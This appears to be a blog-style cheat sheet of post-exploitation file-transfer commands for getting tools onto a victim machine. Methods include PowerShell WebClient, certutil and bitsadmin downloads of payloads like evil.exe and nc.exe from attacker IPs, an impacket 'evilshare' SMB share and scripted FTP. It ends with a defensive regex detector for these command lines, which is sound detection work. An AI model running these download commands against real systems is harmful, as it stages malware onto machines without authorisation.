File Transfer is one of the most crucial aspects of post-exploitation. You will need to move files, exploits, or tools between the victim's machine and your machine. You need to know various methods of transferring files depending on the OS and tools available on the system. Some of them are below:
Linux
HTTP
If the target machine has wget or curl installed, the easiest way to transfer files is through HTTP. You need to start an HTTP server on your host machine in the directory which contains the file you want to transfer.
# Setup http server in Host machine:
## Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080
## php
php -S 0.0.0.0:8080   # the built-in server flag is a capital -S; bind 0.0.0.0 so the target can reach it, not only localhost
## Apache
### For this, copy the file you want to transfer into '/var/www/html', then start the apache service
service apache2 start
Now you can download the files on the target machine as follows.
wget http://<your_hosts_ip>/<file_name>
curl http://<your_hosts_ip>/<file_name> > file
curl -O http://<your_hosts_ip>/<file_name>
Netcat
If netcat is installed on the target machine, we can use it to transfer files.
# First, set up the netcat on target machine to listen for the incoming request.
nc -nvlp 8080 > file
# then send the desired file from your host machine
nc $target_ip 8080 < file
SCP
If you have SSH access to the target machine, you can transfer files using SCP as follows:
## Copy the file:
scp /path/to/source/file.ext username@<target_ip>:/path/to/destination/file.ext
## Copy Directory:
scp -r /path/to/source/dir username@<target_ip>:/path/to/destination
Windows
HTTP
Even though Windows doesn't ship a native wget binary, we can use other options to download files via HTTP. Some of them are:
Powershell
powershell Invoke-WebRequest -Uri http://[vpnIP]:[LPORT2]/Message.exe -OutFile Message.exe
powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/evil.exe', '%temp%\evil.exe');"
powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.x/nc.exe','c:\temp\nc.exe')"
powershell.exe -c "Start-BitsTransfer -Source 'http://10.10.14.x/nc.exe' -Destination 'C:\temp\nc.exe'"
powershell.exe wget "http://10.10.14.x/nc.exe" -OutFile "c:\temp\nc.exe"
Certutil
certutil.exe -urlcache -split -f http://<host_ip>:<port>/file file
Bitsadmin
bitsadmin /transfer evil /download /priority high http://<host_ip>:<port>/file %temp%\file
SMB
The easiest method to transfer files between Linux and Windows is SMB, since it doesn't require any special configuration or commands and SMB is built into every Windows machine. You can also execute a binary directly from the share without copying it to the target machine.
First, start an smb share on your host machine.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py evilshare .
The path to smbserver.py may differ from mine depending on your impacket installation. You can test whether the SMB share is up using the net view command on Windows.
net view \\<host_ip>
Now you can copy files from the share to the target machine using copy or move, and vice versa.
## In target machine download the file using copy
copy \\ip-addr\share-name\file out-file
## to transfer file from target machine to local machine
copy file_name \\ip-addr\share-name
or you can execute the binary directly from the share without copying
\\<host_ip>\share-name\binary.exe
FTP
FTP is another method as handy as SMB as it's also built-in on Windows. However, it will only work if you have an interactive shell where you can use the FTP prompt to issue commands. If you don't have an interactive shell, you will need to create a file containing the command and feed it to FTP.
Install a Python library called pyftpdlib.
sudo apt-get install python3-pyftpdlib
Start an FTP server with:
python3 -m pyftpdlib
# By default, the ftp server runs on port 2121 and accepts anonymous authentication
# you can specify the ports using -p argument
# you can also give write access to anonymous user with -w
If you have an interactive shell, you can just log into the FTP server with ftp <host_ip> <port> and use anonymous as both the username and the password. If you don't have an interactive shell, create a text file with the following content.
open <host_ip> <port>
anonymous
anonymous
binary # remove this line if the file you want to transfer is not binary
get binary_name.exe
bye
Now, simply run ftp -s:filename.txt, and it will download the file you specified.
TFTP
TFTP is similar to FTP, but it isn't installed natively on newer versions of Windows. If it is available on the target machine (you can also enable it with pkgmgr /iu:"TFTP"), you can start a TFTP server on your machine with:
service atftpd start   # place the file in the directory atftpd serves (commonly /srv/tftp on Debian-based systems)
and fetch files onto the target machine with:
tftp -i <host_ip> GET binary.exe
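Every method above leaves a recognisable command line on the target, which is exactly what a defender looks for. The following is an added example, not part of the original post: a small rule-based detector written for this page that runs over constructed process command-line records (the kind of field a Sysmon Event ID 1, EDR or auditd execve record carries) and labels the transfer technique from this page that each one uses. The rule names, the sample command lines and the finding format are this example's own assumptions; the constructed samples deliberately include benign uses such as certutil -hashfile to show that the rules are bounded and do not fire on them.

```python
import re

# Constructed sample command lines (not real telemetry), one per process
# execution, mirroring the commands catalogued in this post plus two benign ones.
SAMPLE_CMDLINES = [
    "certutil.exe -urlcache -split -f http://10.0.0.5:8080/file file",
    "bitsadmin /transfer evil /download /priority high http://10.0.0.5:8080/file C:\\Users\\u\\AppData\\Local\\Temp\\file",
    "powershell.exe -c \"(new-object System.Net.WebClient).DownloadFile('http://10.0.0.5/nc.exe','c:\\temp\\nc.exe')\"",
    "powershell Invoke-WebRequest -Uri http://10.0.0.5:8080/Message.exe -OutFile Message.exe",
    "powershell.exe -c \"Start-BitsTransfer -Source 'http://10.0.0.5/nc.exe' -Destination 'C:\\temp\\nc.exe'\"",
    "powershell.exe wget \"http://10.0.0.5/nc.exe\" -OutFile \"c:\\temp\\nc.exe\"",
    "copy \\\\10.0.0.5\\evilshare\\file out-file",
    "\\\\10.0.0.5\\evilshare\\binary.exe",
    "ftp -s:commands.txt",
    "tftp -i 10.0.0.5 GET binary.exe",
    "wget http://10.0.0.5:8080/linpeas.sh",
    "curl -O http://10.0.0.5:8080/tool",
    "nc -nvlp 8080 > file",                                     # as seen in a shell history
    "certutil.exe -hashfile C:\\Windows\\notepad.exe SHA256",   # benign certutil use
    "notepad.exe C:\\Users\\u\\notes.txt",                       # benign
]

# Each rule is (technique label, compiled regex). Patterns are anchored or
# bounded to the tell-tale flag so that ordinary uses of the same binary
# (certutil -hashfile, a plain ftp session) are not flagged.
RULES = [
    ("certutil-urlcache", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.I)),
    ("bitsadmin-transfer", re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b", re.I)),
    ("powershell-webclient-download", re.compile(r"System\.Net\.WebClient|\.DownloadFile\(", re.I)),
    ("powershell-invoke-webrequest", re.compile(r"Invoke-WebRequest|\biwr\b", re.I)),
    ("powershell-start-bitstransfer", re.compile(r"Start-BitsTransfer", re.I)),
    ("powershell-wget-alias", re.compile(r"\bpowershell(?:\.exe)?\b.*\bwget\b", re.I)),
    ("smb-unc-copy", re.compile(r"^\s*(?:copy|move|xcopy)\b.*\\\\[\w.\-]+\\", re.I)),
    ("smb-unc-exec", re.compile(r"^\s*\\\\[\w.\-]+\\\S+\.exe\b", re.I)),
    ("ftp-script-file", re.compile(r"^\s*ftp(?:\.exe)?\b.*-s:", re.I)),
    ("tftp-get", re.compile(r"^\s*tftp(?:\.exe)?\b.*\bget\b", re.I)),
    ("linux-http-download", re.compile(r"^\s*(?:wget|curl)\b.*https?://", re.I)),
    ("netcat-listener", re.compile(r"^\s*(?:nc|ncat|netcat)\b.*\s-[a-z]*l", re.I)),
]

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)       # the download source
UNC_RE = re.compile(r"\\\\[\w.\-]+\\[^\s'\"]*")          # \\host\share\path


def classify(cmdline):
    """Return the labels of every rule that matches this command line (empty list if none)."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def extract_urls(cmdline):
    """Pull out HTTP(S) URLs so the staging host can be pivoted on in other logs."""
    return URL_RE.findall(cmdline)


def extract_unc_paths(cmdline):
    """Pull out UNC paths (SMB shares) referenced by the command line."""
    return UNC_RE.findall(cmdline)


def scan(cmdlines):
    """Return one finding dict per command line that matches at least one rule."""
    findings = []
    for line in cmdlines:
        techniques = classify(line)
        if techniques:
            findings.append({
                "cmdline": line,
                "techniques": techniques,
                "urls": extract_urls(line),
                "unc_paths": extract_unc_paths(line),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(", ".join(finding["techniques"]), "<-", finding["cmdline"])
```

Run as-is it prints thirteen findings and stays silent on the two benign lines. In a real deployment the same rules would be fed from your process-creation telemetry rather than the constructed list, and the extracted URL or UNC host is the value to correlate against proxy, DNS and SMB logs to confirm the staging server.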
These are the most popular methods of post-exploit file transfer on Windows and Linux! Catch you in the next one.